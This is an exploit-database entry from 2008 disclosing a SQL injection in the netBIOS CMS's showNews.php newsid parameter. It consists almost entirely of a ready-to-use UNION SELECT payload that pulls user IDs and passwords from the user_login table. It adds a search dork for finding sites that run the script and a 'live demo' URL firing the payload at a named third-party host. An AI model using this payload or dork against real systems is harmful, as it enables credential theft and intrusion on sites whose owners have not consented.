id: 3213
date: 06/17/2008
title: netBIOS (showNews.php newsid) SQL Injection Vulnerability
author: security fears team
cves: 

=========================================================
netBIOS (showNews.php newsid) SQL Injection Vulnerability
=========================================================



#################################################################################################
#################################### Viva IslaM Viva IslaM ######################################
###                                                                                           ###
###                            rEm0te sql injction VulnErability                              ###
###                                                                                           ###
###                                  (Net bios script)                                        ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### Script Name :  netBIOS                                                                    ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### d0rk ::  "Powered by netBIOS"                                                             ###
###                                                                                           ###
###                                                                                           ###
### -(:: sql Code ::)-                                                                        ###
###        showNews.php?newsid=(sql)                                                          ###
###(sql):-10+union+select+1,concat_ws(0x3a3a,ul_id,ul_password),3,4,5,6,7,8,9,10+from+user_login/*                   
###                                                                                           ###
#################################################################################################
###                                                                                           ###
### -(::  l!ve demo ::)-                                                                      ###
###                                                                                           ###
###http://swtdemo.com/cms/php/showNews.php?newsid=-10+union+select+1,concat_ws(0x3a3a,ul_id,ul_password),3,4,5,6,7,8,9,10+from+user_login/*
###                                                                                           ###
###                                                                                           ###
########################                                                    #####################
########################                                                    #####################
#################################################################################################
#################################################################################################



#  0day.today [2023-03-26]  #